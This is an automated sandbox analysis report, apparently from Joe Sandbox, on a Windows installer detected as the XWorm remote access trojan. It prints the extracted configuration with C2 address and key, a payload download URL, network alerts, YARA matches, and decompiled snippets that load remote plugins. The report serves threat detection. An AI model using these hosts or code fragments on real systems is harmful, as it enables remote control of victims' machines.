Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
33__Installer.exe

Overview

General Information

Sample name:33__Installer.exe
Analysis ID:1466312
MD5:8182ed62008e7526ae7e1f7d702fbcb6
SHA1:3a3808eefd17f32bc074c739586b6b36c0a06c15
SHA256:a862efea745fd2c39b097d2e1e1d6961ba4d6f8e5c2823d345c5035b95d44f69
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 33__Installer.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\33__Installer.exe" MD5: 8182ED62008E7526AE7E1F7D702FBCB6)
  • cleanup
{"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x12072:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Downloads\ind.jpgWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: 33__Installer.exe PID: 6556JoeSecurity_XWormYara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.33__Installer.exe.6160000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.33__Installer.exe.6160000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          0.2.33__Installer.exe.6160000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.33__Installer.exe.6160000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x4cf2:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            Timestamp:07/02/24-19:28:04.062990
            SID:2852923
            Source Port:49731
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:27:07.814963
            SID:2853193
            Source Port:49731
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:27:50.409497
            SID:2852874
            Source Port:7000
            Destination Port:49731
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:28:04.061886
            SID:2852870
            Source Port:7000
            Destination Port:49731
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:24:21.363862
            SID:2855924
            Source Port:49731
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: 33__Installer.exeReversingLabs: Detection: 26%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 33__Installer.exeJoe Sandbox ML: detected
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpackString decryptor: 117.41.184.33
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpackString decryptor: 7000
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpackString decryptor: <123456789>
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpackString decryptor: XWorm V5.6
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpackString decryptor: USB.exe
            Source: 33__Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 33__Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 117.41.184.33:7000 -> 192.168.2.4:49731
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 117.41.184.33:7000 -> 192.168.2.4:49731
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000
            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 117.41.184.33:7000
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000
            Source: Malware configuration extractorURLs: 117.41.184.33
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49730
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.208.240.157:881
            Source: global trafficTCP traffic: 192.168.2.4:49731 -> 117.41.184.33:7000
            Source: Joe Sandbox ViewASN Name: CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: unknownTCP traffic detected without corresponding DNS query: 117.41.184.33
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C23910 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetCloseHandle,std::ios_base::_Ios_base_dtor,InternetCloseHandle,0_2_00C23910
            Source: global trafficHTTP traffic detected: GET /330.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: guanlix.cn
            Source: 33__Installer.exeString found in binary or memory: http://guanlix.cn:881/330.ccp
            Source: 33__Installer.exe, 00000000.00000002.4105093119.00000000014BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://guanlix.cn:881/330.ccp&(
            Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\33__Installer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C301C90_2_00C301C9
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C359E90_2_00C359E9
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C309FC0_2_00C309FC
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C311B60_2_00C311B6
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C36B670_2_00C36B67
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C3648B0_2_00C3648B
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C30DCE0_2_00C30DCE
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C3065E0_2_00C3065E
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C37E2F0_2_00C37E2F
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C35F3A0_2_00C35F3A
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_0617A0100_2_0617A010
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_06174E680_2_06174E68
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_06177CB00_2_06177CB0
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_06175B400_2_06175B40
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_0617E9200_2_0617E920
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_061707A00_2_061707A0
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_06174B200_2_06174B20
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: String function: 00C2AF90 appears 45 times
            Source: 33__Installer.exe, 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe
            Source: 33__Installer.exe, 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 33__Installer.exe
            Source: 33__Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe
            Source: 33__Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/2
            Source: C:\Users\user\Desktop\33__Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccpJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeMutant created: NULL
            Source: C:\Users\user\Desktop\33__Installer.exeMutant created: \Sessions\1\BaseNamedObjects\20UmI84cKfMqQ1HH
            Source: 33__Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\33__Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 33__Installer.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: 33__Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 33__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 33__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 33__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 33__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 33__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C345F4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C345F4
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C27059 push ecx; ret 0_2_00C2706C
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C26004 push dword ptr [ecx-75h]; iretd 0_2_00C26011
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C316CD push 00000008h; ret 0_2_00C316CF
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C316E9 push cs; ret 0_2_00C316F7
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C316F8 push es; ret 0_2_00C316FF
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C2AFD5 push ecx; ret 0_2_00C2AFE8
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_061770F8 pushad ; iretd 0_2_06177105

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49730
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
